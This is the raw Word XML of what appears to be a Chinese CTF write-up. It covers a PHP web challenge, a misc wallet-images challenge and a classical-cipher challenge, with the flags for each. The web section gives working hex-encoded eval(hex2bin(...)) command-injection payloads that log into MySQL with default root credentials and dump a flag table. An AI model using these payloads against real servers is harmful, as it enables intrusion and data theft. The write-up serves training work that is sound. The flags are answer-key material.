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9BB8C1" w14:textId="599AE126" w:rsidR="00007D2D" w:rsidRDefault="00007D2D">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="el-dialogtitle"/>
        </w:rPr>
        <w:t>Simple_php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57252176" w14:textId="2B8E8547" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whereis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="468187F4" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>查看系统安装了</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72497E8B" w14:textId="44EB5F92" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>尝试登陆</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="088891B6" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u root -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e 'show databases'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AA64A" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>没有回显</w:t>
      </w:r>
      <w:r>
        <w:t>,php</w:t>
      </w:r>
      <w:r>
        <w:t>没有过滤</w:t>
      </w:r>
      <w:r>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>可以命令执行用</w:t>
      </w:r>
      <w:r>
        <w:t>hex2bin</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>进制转换为</w:t>
      </w:r>
      <w:r>
        <w:t>ascii</w:t>
      </w:r>
      <w:r>
        <w:t>码去命令执行</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA6769" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">php -r eval(hex2bin(comm)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDEACF" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>但是抱错只能有一行，用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">substr </w:t>
      </w:r>
      <w:r>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5BB7F" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>php -r eval(hex2bin(substr(,1)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156EF1A" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>echo `mysql -uroot -proot -e 'show databases;'`;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> php -r eval(hex2bin(substr(_6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202773686f77206461746162617365733b27603b,1))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:PHP_CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FE163" w14:textId="58D09932" w:rsidR="0094183B" w:rsidRDefault="00000000" w:rsidP="00131DC3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>echo `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uroot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proot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e 'use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>PHP_CMS;show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables;'`;</w:t>
      </w:r>
      <w:r>
        <w:br/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hp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r eval(hex2bin(substr(_6563686f20606d7973716c202d75726f6f74202d70726f6f74202d652027757365205048505f434d533b73686f77207461626c65733b27603b,1))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:F1ag_Se3Re7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23965B1F" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;select * from F1ag_Se3Re7;'`;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> php -r eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1))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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag{78ef85df-3413-4851-9e1b-d18e88900ade}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A328B07" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="0094183B">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600C726B" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="0094183B">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588E5BC5" w14:textId="77777777" w:rsidR="0094183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5E54510" wp14:editId="779767E0">
            <wp:extent cx="5334000" cy="2996207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pduck\AppData\Roaming\Typora\typora-user-images\image-20240519095324754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379CB" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="0094183B">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4449CC" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="0094183B">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CFE3EA" w14:textId="125482C0" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:r w:rsidR="009E5890">
        <w:rPr>
          <w:rStyle w:val="el-dialogtitle"/>
        </w:rPr>
        <w:t>火锅链观光打</w:t>
      </w:r>
      <w:r w:rsidR="009E5890">
        <w:rPr>
          <w:rStyle w:val="el-dialogtitle"/>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63674273" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>连接到钱包，搜集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个图片后拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D29B2" w14:textId="77777777" w:rsidR="0094183B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t>flag{y0u_ar3_hotpot_K1ng}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D05E84" w14:textId="77777777" w:rsidR="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4ECB9D" w14:textId="77777777" w:rsidR="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD54EEB" w14:textId="77777777" w:rsidR="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55D560F1" w14:textId="6C991846" w:rsidR="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Crypto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152A32C" w14:textId="713AD777" w:rsidR="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>古典密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45815640" w14:textId="2D9089BB" w:rsidR="000721F0" w:rsidRDefault="00FE15F6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="001317E1">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>https://cyberchef.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解密网站的暴力破解模式，直接得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidR="006D25E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6800FE" w14:textId="07226171" w:rsidR="006D25E6" w:rsidRDefault="006D25E6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D25E6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>flag{b2bb0873-8cae-4977-a6de-0e298f0744c3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2D60DA" w14:textId="66FE0818" w:rsidR="000721F0" w:rsidRPr="000721F0" w:rsidRDefault="000721F0">
      <w:pPr>
        <w:pStyle w:val="a0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3A896B44" wp14:editId="66F41B0D">
            <wp:extent cx="5943600" cy="3338195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7063442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3442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21F0" w:rsidRPr="000721F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92879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84245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183B"/>
    <w:rsid w:val="00007D2D"/>
    <w:rsid w:val="000168D4"/>
    <w:rsid w:val="000721F0"/>
    <w:rsid w:val="00131DC3"/>
    <w:rsid w:val="006D25E6"/>
    <w:rsid w:val="0094183B"/>
    <w:rsid w:val="009E5890"/>
    <w:rsid w:val="009F3607"/>
    <w:rsid w:val="00EB74C4"/>
    <w:rsid w:val="00EE59EB"/>
    <w:rsid w:val="00FE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BAF7C"/>
  <w15:docId w15:val="{14027CA9-7B5F-47D0-ABE8-E01F9B54E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FE15F6"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="el-dialogtitle">
    <w:name w:val="el-dialog__title"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00007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yberchef.org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turate Nil</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-19T10:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-19T10:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>